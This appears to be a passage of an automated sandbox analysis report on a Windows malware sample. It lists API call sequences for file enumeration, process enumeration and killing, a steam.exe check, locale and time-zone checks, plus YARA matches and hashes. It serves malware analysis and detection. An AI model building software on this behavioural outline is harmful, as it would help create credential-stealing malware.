                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B2402
                                    • lstrlen.KERNEL32(\*.*), ref: 000B240D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B242A
                                    • lstrcat.KERNEL32(00000000,\*.*), ref: 000B2436
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B246A
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 000B2486
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2567437900-1173974218
                                    • Opcode ID: 56f113bd782de1cb8c797c4a4f1bfb31420902069356f80beec158f2b6649970
                                    • Instruction ID: 86e8c9fc9758242241076ddc03e09a4715d925fd8f4864e637b65a773042529e
                                    • Opcode Fuzzy Hash: 56f113bd782de1cb8c797c4a4f1bfb31420902069356f80beec158f2b6649970
                                    • Instruction Fuzzy Hash: D7414F31611215DBCB32EFA8EC89ADF77E4AF25700F045139F94A9BA22DB30DD418B91
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 000C46B9
                                    • Process32First.KERNEL32(00000000,00000128), ref: 000C46C9
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 000C46DB
                                    • StrCmpCA.SHLWAPI(?,?), ref: 000C46ED
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000C4702
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 000C4711
                                    • CloseHandle.KERNEL32(00000000), ref: 000C4718
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 000C4726
                                    • CloseHandle.KERNEL32(00000000), ref: 000C4731
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 3836391474-0
                                    • Opcode ID: f8c3fd37bbb59855b4cea29dbb7b126e42d5468ed7864d586c3277b95d742d34
                                    • Instruction ID: 809c414e845737b75745b1cacbe12e734b7cefb652f0b76a2f81417d63a13998
                                    • Opcode Fuzzy Hash: f8c3fd37bbb59855b4cea29dbb7b126e42d5468ed7864d586c3277b95d742d34
                                    • Instruction Fuzzy Hash: 74016D31A02124ABE7615B65BC8DFFE37BCAB49B12F04019AF94991190EF749D848A61
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 000C4628
                                    • Process32First.KERNEL32(00000000,00000128), ref: 000C4638
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 000C464A
                                    • StrCmpCA.SHLWAPI(?,steam.exe), ref: 000C4660
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 000C4672
                                    • CloseHandle.KERNEL32(00000000), ref: 000C467D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                    • String ID: steam.exe
                                    • API String ID: 2284531361-2826358650
                                    • Opcode ID: 0579f1575f1e25d10cdf0ac370a5629ceaea9cd215fce386454a82fe147b150f
                                    • Instruction ID: 913c9b9c1419b6cca9465bf16de67a75aed675b76c45a6cfcadb5bf319276a80
                                    • Opcode Fuzzy Hash: 0579f1575f1e25d10cdf0ac370a5629ceaea9cd215fce386454a82fe147b150f
                                    • Instruction Fuzzy Hash: 6C018F71A02224ABD760AB64BC4DFEE77ACEB09351F0401DAFD48D1040EB749D948BE1
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B4B51
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B4B74
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B4B7F
                                    • lstrlen.KERNEL32(000D4CA8), ref: 000B4B8A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B4BA7
                                    • lstrcat.KERNEL32(00000000,000D4CA8), ref: 000B4BB3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B4BDE
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 000B4BFA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                    • String ID:
                                    • API String ID: 2567437900-0
                                    • Opcode ID: 928e27cc82289acb6219fd7a70149fc481ca150d353578f88c5843cada9ddcba
                                    • Instruction ID: cbace958ef3af48c2062ea04b4856792e10cbe67a401948af7dc0b84a1580bf6
                                    • Opcode Fuzzy Hash: 928e27cc82289acb6219fd7a70149fc481ca150d353578f88c5843cada9ddcba
                                    • Instruction Fuzzy Hash: 28310D316215159BCB22EFA8EC89EDE77F9AF61700F041135F9499B663EB30DD018B91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: +ot$/J?=$/J?=$:JI$<D>%$@'~-$o>v$/w
                                    • API String ID: 0-2428296759
                                    • Opcode ID: 8501148803a364389ef1ab2b8352778cae570b8c68027cc47eba22a38adc017e
                                    • Instruction ID: edd38893e8d0cad6677de66b1f29575c85035f6f94fed70a3488bb7b6dbbf8ba
                                    • Opcode Fuzzy Hash: 8501148803a364389ef1ab2b8352778cae570b8c68027cc47eba22a38adc017e
                                    • Instruction Fuzzy Hash: B3B217F3A0C2049FD304AE2DEC8566AFBE5EF94720F1A493DEAC4C7740E67598058697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 2Es~$:Gq_$?V~~$d{}$q)y$s-n[$v+$S
                                    • API String ID: 0-953988413
                                    • Opcode ID: ab23d02b751d8560b1d5940f104597b885e5cc1dce03822f24f0c5ba3f15ac31
                                    • Instruction ID: b122d33de5dd1da4d42d36aef9759d5d16b2205007ae91eddcbc534927d65c9c
                                    • Opcode Fuzzy Hash: ab23d02b751d8560b1d5940f104597b885e5cc1dce03822f24f0c5ba3f15ac31
                                    • Instruction Fuzzy Hash: 23A2E4F360C6149FE704AE2DEC8567ABBE9EF94320F1A493DEAC4C3340E63558458697
                                    APIs
                                      • Part of subcall function 000C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 000C71FE
                                    • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 000C2D9B
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 000C2DAD
                                    • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 000C2DBA
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 000C2DEC
                                    • LocalFree.KERNEL32(00000000), ref: 000C2FCA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: 42173a6ca9974d2a76468edacf9866e30e3e82ed66f4875175c669aa80c25004
                                    • Instruction ID: 278d21baa926155f77705a6ec7a8622b5527897da878dd66ac03147884fe68ed
                                    • Opcode Fuzzy Hash: 42173a6ca9974d2a76468edacf9866e30e3e82ed66f4875175c669aa80c25004
                                    • Instruction Fuzzy Hash: D2B11671901214CFD755CF18D988B9DB7F1BB44329F29C1AEE408AB6A2D7769D82CF80
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 3mW}$Vg$Ws7$di{;$e&{$t&w$Uw
                                    • API String ID: 0-4138245297
                                    • Opcode ID: 31defb3a8f9a530eb5e92bb3673ce7d62d6ea069cb69f1dcf09b7b18052d5671
                                    • Instruction ID: fb7382b1c2d74074e6b23e966afad1d709b1dd7f70e3e623a4e345d38ae8c6b9
                                    • Opcode Fuzzy Hash: 31defb3a8f9a530eb5e92bb3673ce7d62d6ea069cb69f1dcf09b7b18052d5671
                                    • Instruction Fuzzy Hash: CBB229F3A082049FD3046E2DEC8567AF7E9EFD4720F1A863DEAC487744E93558058696
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ?q[$Nav$Q=$aQ{$qpq$D?{
                                    • API String ID: 0-3850499687
                                    • Opcode ID: 624d4c4ad2cdf2828c130da73c8c224f4fd76262865d1621c6353f72e279ec56
                                    • Instruction ID: 9dacab9e69096e77d00f5700c669195bcda082a8dab54bfb41f72a9363420c6f
                                    • Opcode Fuzzy Hash: 624d4c4ad2cdf2828c130da73c8c224f4fd76262865d1621c6353f72e279ec56
                                    • Instruction Fuzzy Hash: 7BB24BF360C2049FE308AE2DEC8567AB7E6EFD4720F1A853DE6C5C7744EA3558018696
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: w^$)f$ERl[$PLGY$Y16R$?[n
                                    • API String ID: 0-502583953
                                    • Opcode ID: 6df70cf0b891fe1e42f90eb6f476782f5e81f176729781dac06be9ced50f25f7
                                    • Instruction ID: 03126ae4140b674bad3a26c1cd670cefceb3ecf80c99e592f59b1328ba90d312
                                    • Opcode Fuzzy Hash: 6df70cf0b891fe1e42f90eb6f476782f5e81f176729781dac06be9ced50f25f7
                                    • Instruction Fuzzy Hash: 3EA2F8F360C204AFE304AE2DEC8567ABBE9EF94720F16453DE6C5C3744EA3598058697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: %,}w$8OX$RuP3$UZ7y$fXw$r}z
                                    • API String ID: 0-582109498
                                    • Opcode ID: 979cbf466dd48031069ce682e3978ded3d7d42aad80f261ff0681c5c3238dbba
                                    • Instruction ID: 508c5d1e504e0a81ff3d04dfe27ce1d9bc1f8398af24e5d1b2365c9659b8a14b
                                    • Opcode Fuzzy Hash: 979cbf466dd48031069ce682e3978ded3d7d42aad80f261ff0681c5c3238dbba
                                    • Instruction Fuzzy Hash: ECB228F36086049FE704AE2DEC8567AFBE6EFD4220F1A853DEAC4C3744E63558058697
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 000C2C42
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000C2C49
                                    • GetTimeZoneInformation.KERNEL32(?), ref: 000C2C58
                                    • wsprintfA.USER32 ref: 000C2C83
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID: wwww
                                    • API String ID: 3317088062-671953474
                                    • Opcode ID: ae0c52f9ff6751cf55f3d876fce4dd7088b5f86ab8e025efde5d418f695d6bb1
                                    • Instruction ID: afa430124b1b28a29f199cd200a649b5c5e721c3b33368dc40094770953d3a82
                                    • Opcode Fuzzy Hash: ae0c52f9ff6751cf55f3d876fce4dd7088b5f86ab8e025efde5d418f695d6bb1
                                    • Instruction Fuzzy Hash: C301DF71E00604ABCB189B58EC4EF6EBB69EB84721F00432AF9169B6C0D7741D008AE1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Fvo$"L.i$W36w$v_{$|c=
                                    • API String ID: 0-3770595245
                                    • Opcode ID: f70964eb7978e28d041ad02babf26aedb2130bce1dd1a371ea2104e101d8cbb3
                                    • Instruction ID: bfd3b5b66fbe8c73bed15275875fbb0f2ddc9c20d822200a27f1031c12c68a73
                                    • Opcode Fuzzy Hash: f70964eb7978e28d041ad02babf26aedb2130bce1dd1a371ea2104e101d8cbb3
                                    • Instruction Fuzzy Hash: A8B215F36082049FE304AE2DEC8567AFBE5EF94220F164A3DEAC5C7744E63598058797
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 3Bot$7_=$@HWE$Bn$O=
                                    • API String ID: 0-1397858828
                                    • Opcode ID: 8edf2483fe671f3278489c0443fb8cae3a7f8928231a4865ed1494338f873e9b
                                    • Instruction ID: 9da62bc75859ae178adf6dbc65440738f9a4dbd420449376faab08bf0f52842f
                                    • Opcode Fuzzy Hash: 8edf2483fe671f3278489c0443fb8cae3a7f8928231a4865ed1494338f873e9b
                                    • Instruction Fuzzy Hash: 6BA209F360C204AFE3046E2DEC8577AB7D9EF94320F16863DEAC4C7744EA7598058696
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 000C1B72
                                      • Part of subcall function 000C1820: lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C184F
                                      • Part of subcall function 000C1820: lstrlen.KERNEL32(00E56198), ref: 000C1860
                                      • Part of subcall function 000C1820: lstrcpy.KERNEL32(00000000,00000000), ref: 000C1887
                                      • Part of subcall function 000C1820: lstrcat.KERNEL32(00000000,00000000), ref: 000C1892
                                      • Part of subcall function 000C1820: lstrcpy.KERNEL32(00000000,00000000), ref: 000C18C1
                                      • Part of subcall function 000C1820: lstrlen.KERNEL32(000D4FA0), ref: 000C18D3
                                      • Part of subcall function 000C1820: lstrcpy.KERNEL32(00000000,00000000), ref: 000C18F4
                                      • Part of subcall function 000C1820: lstrcat.KERNEL32(00000000,000D4FA0), ref: 000C1900
                                      • Part of subcall function 000C1820: lstrcpy.KERNEL32(00000000,00000000), ref: 000C192F
                                    • sscanf.NTDLL ref: 000C1B9A
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 000C1BB6
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 000C1BC6
                                    • ExitProcess.KERNEL32 ref: 000C1BE3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 3040284667-0
                                    • Opcode ID: 862c37a781c6468d4ac94929a677811c3b803091013de9de998ab574cdf75a88
                                    • Instruction ID: c68d6785eecbd93c8185d23785f09ee37109af2953747caaaef2b94d19532285
                                    • Opcode Fuzzy Hash: 862c37a781c6468d4ac94929a677811c3b803091013de9de998ab574cdf75a88
                                    • Instruction Fuzzy Hash: 3221F7B1518301AF8350EF69E88499FBBF8FFD9215F404A1EF599C3220E730D9048BA2
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 000A775E
